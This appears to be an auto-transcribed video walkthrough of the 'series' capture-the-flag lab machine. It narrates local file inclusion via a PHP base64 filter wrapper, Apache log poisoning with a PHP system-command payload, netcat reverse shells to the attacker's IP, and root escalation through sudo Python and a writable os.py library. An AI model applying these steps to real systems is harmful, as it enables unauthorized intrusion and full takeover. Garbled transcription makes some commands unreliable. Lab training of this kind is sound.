Hello guys, welcome back to a pentest club. Today we're going to solve another CTF challenge name called series. So what is the basic penetration testing methodologies we used here? So the basic penetration testing methodologies we used here: network discovery, enumeration, exploitation, privilege escalation, and capture the flag. Now, first open the terminal. Now you just type here as a sudo su, enter your password, then later you just type here as net discover -I equals 0. So first we would like to identify our target machine. So I have identified my target machine is here. Now I just quit now. You just type it as nmap -t4 -a is on a CReSIS scan and enter your targeted IP address. Now let's wait for the nmap result. So we have got the nmap result. One is available with SH, another one is available with port 8. Now let's open the Firefox. Now enter our targeted IP address 192.168.18.206. We can see it's like M. We would like to look the pets here. There is nothing else apart from here. Okay. We just try to copy. Come back here. Now we would like to go with as a directory buster. Then let's just paste this. Then later we would like to come back here. We would like to go with as inito -h. Then let's just paste this here also. We not yet get any useful information from here. We would like to utilize here. Then I would like to get only with a PHP. What is available over there? I have got one is with a file.php, another one is secret.php. Now we would like to visit one is with a file.php. There is nothing else to get it from here. Okay. Then we would like to come back to a secret.php. We are getting here as a www.data directory. Quite interesting here. We would like to look the pet source. Okay. Apart from here, there is nothing else. Okay. Now, we would like to focus only in the file.php. So, if we use a wrapper for the secret file, it will be returned like a string in the base64. But there is a small detail when you using a wrapper. The detail is that when writing in a secret.php, you have to put it without a PHP extension so that the wrapper works. If does not remove the extensions, the wrapper will not work. That happens because the file makes and include a .php. It would be like a putting a secret.php.aphp. But if we remove the .php and put only a secret, the final result will become unstored with a PHP. Now, we would like to look here. We already went here in the file.php. Now we would like to write a PHP filter here, a file.php. Now we would like to write here as a file equal to, let's just put here a PHP. Now we would like to make it as a filter. Put here as a convert dot a base64 encode as a resource equal to secret. That's it. I have got here. Even if you try with this, so let me. Even with if you try, let me just type here as curl -s. Then I just paste here. Even you get exactly the base64. Now copy this base64 and you just type here as a echo. Then let's just paste it. Then you just put here as a base64 as decode. I have got a hidden directory is a my secret. Now we would like to visit this a directory. Now let's come back here. let's visit to this secret. It was a forbidden. Okay. Now we would like to go with a directory master. First of all, we just paste this. Uh, what else we can get from here? But we not yet get any useful informations. Then I would like to try with as PHP. That's quite good. I have got one is with a file.php. Let we would like to open, but we not yet any useful information here. Now, in this case, even if you try to find the right parameter ID, you utilizing as a Arjun minus u, then let's just paste this. No parameters was discovered. So before that, we would like to utilize the file. Okay, let's just put here a file equal to as a etc as password. We have got it here. We would like to look the page source. In this page source, we have got it here. One is uh, GI USSP and system D. That's it. There is only one user. Quite interesting. So we have got the local file inclusion now. So once you have got the local file inclusion, now we would like to try here. I think it was hosted in the Apache or something else. So we would like to look here as where. Let's we just look here as log with the Apache 2 with the access.log. Yes, it was available, the access log. Now, we would like to open with the Burp Suite. Let it launch this one. So once this is launched, will it not even started? Yes. Now we would like to start this. Now let's come to this proxy. Interception is on. Now uh, now let's we would like to make it this Burp Suite. Now come back. Oh, sorry. I would like to disable this. I would like to just copy, come back here, paste it. Now, we would like to try to run this. Where we can see this. I would like to send to any repeater. In the repeater tab, where we would like to try to, first of all, try to send. Where we can see here, everything is clear. We would like to look in the render. Okay, we are getting everything clear. So I would like to modify in the Linux place here as a gecko. Gecko is for uh, uh, wherever you can use in the Linux, you can utilize a terminal for that. Okay, gecko terminals. So I would like to delete this a Linux in this case. So X11 to a Linux. Now I would like to try to put here with PHP system. Then you just put here a dollars underscore get cmd. That's it here. Now let you can try to send it. Yes, you can verify this one. It was sent uh, as a get with HTTP. Quite good now. Now we would like to try to verify this command. Now let we would like to come back to a Burp Suite. Let's disable it. Now where we would like to go here as a access log and cmd equal to as a id. So I think we would like to look this one in the page source. There, this is a lengthy thing here. How we can verify here? But in this case, we cannot able to verify here. Uh, let we would like to find here as a www data. So let we would like to look here new ID. But we not yet get here. But it's quite working. Like we would like to put here netcat minus lvnp. I would like to try with 7890. So let we would like to try here with the netcat minus e. Let's just put here as a with the bin bash. Now enter our target. Type address 192.168.18.122.7890. Now it was scrolling. Then I have get a connected. So in that large data, you cannot able to search everything like this. So once you have get a connected here. Now you just type here as who am I? Now you just type here as a which Python. You have got it here. You just type here as Python minus C. Import as a pty. Pty is pat bin bash. Now, we just come to any secret. Now, let's we just try here as pwd. Now just type here as cd as a home directory. Let me just type here as export term equal to extra cd. Now we would like to go to in this. Permission is denied. Okay. If permission is denied, now just type here as cd where www html. Then let's just type here as clear list minus f. Now let me just type here as sudo minus l where it have a no password and it was written in the Python also. So for this it's easy way to get it here. You just type here as sudo minus u. What is the username? Is GIUSESP. Then let's just put here as a user bin as a Python. Now just put here as minus C. Just put here as a import as a OS. Uh, then OS dot a system. Then you just type it as bin uh, bash. That's it. Now I have successfully come to the CReSIS. Now let's go to as home directory. Type plus minus L cd. Just copy and just paste here. Now type here as clear plus minus L cat user.exe. We have get the user flag. Now we would like to get come back here. Let's uh, ps pspy 64 github. We would like to try to get to this one. Now I would like to try to download. Now cd downloads. Now copy this pspy 64 to home pentest club. Now let me just type here as clear. Type cd plus. I have here pspy. Now you just type here as python minus m http.a server. Now you just type here as cd and get into the temp directory. You just type it as wget http. Enter your target IP address 192.168.18.122 which with the 8000 pspy s64. Where I have got it here, you just type as chmod plus x ps py as 64. Now let's run here pspy 64. Now we would like to wait for this. What we can observe from here to get a root privilege access. So in the op directory, we can see here as a important dot python. So that we would like to uh, look that one first. Then let me just quit. So if we quit this one, it will automatically fit entirely. Now later we would like to go here. Again we need to come. I just type it as python and see import as a pdy span bin bash. This is done. Now just go to here as where www as html. Let me just type here as export term equal to x term. Let me just type here as clear. Now we would like to try to utilize here. You just put here as sudo minus u. Username is that CReSIS GIUSE user bin let's just put here as python minus c put for as a import os dot system bin bash. That's it. where we have successfully came here. Now, we already know that one. Uh, cd as home directory. Oh, sorry, cd home directory. Let me just type it as clear plus minus air. Cd as a opt. Now just type it as clear plus minus air. Cat important.python. Now, where you can look here, important os dot system user bin with id. It will print the id. User bin sleep 15 seconds. User bin remove. It will remove the id. User bin sleep for a 15 seconds. So we would like to try to look here very carefully. I would like to try. Is anywhere is writable for this system? Now let me just try to find with writable. Two is greater than Dave or none. Then just put here as grep minus v minus I minus E. I would like to write proc or run, then system or dev. That's it. In this system, where should I can write something to get a root access with this? So let me just try to run here. So here I have the exact thing, like look here, userlib python 2 with the os.python. Let's just copy, type here as cat. Let's just paste here. In this case, is available to read and write. So let me just type here as clear. Now I would like to write here as list minus LA. Then let's just paste this. It have read and write permissions of this one. Okay, quite very good now. Now, I would like to set up Netcat listener here. Let me just open a terminal. Netcat minus lvnp. Now, let me just put here as 191997. Now, you can write here as echo. Put here as a import as for a sub process. Then put here as sub process dot call as netcat. Oh, sorry. We would like to utilize here as a netcat. Everything we would like to write here very clear minus e. Oh, sorry. Minus e. Then let's just put here as bin bash. Then now enter our targeted IP address 192.168.18.122. Then let we just try here as 1997. Then just go to here as a shell equal to false. Then let's just close this. Now you need to utilize this one to right entirely. Just copy, paste it. That's it. Now, it was written here exactly what we required. Now, let's, we would like to look here. So, in this Netcat, we have get here everything clear. Look here, we have get a connected automatically. You just type here as a which Python you have got it here. You just type it as Python minus C as import as pdy as pdy is back bin bash. Quite good. I came directly to a root. ID, we are in the root. Who am I? We are in the root. PWD, we are in the root. List minus F, cat, a root.txt. We have successfully get the root flag also. That's it. So, you try it your own guys. Thank you guys for watching and keep smiling.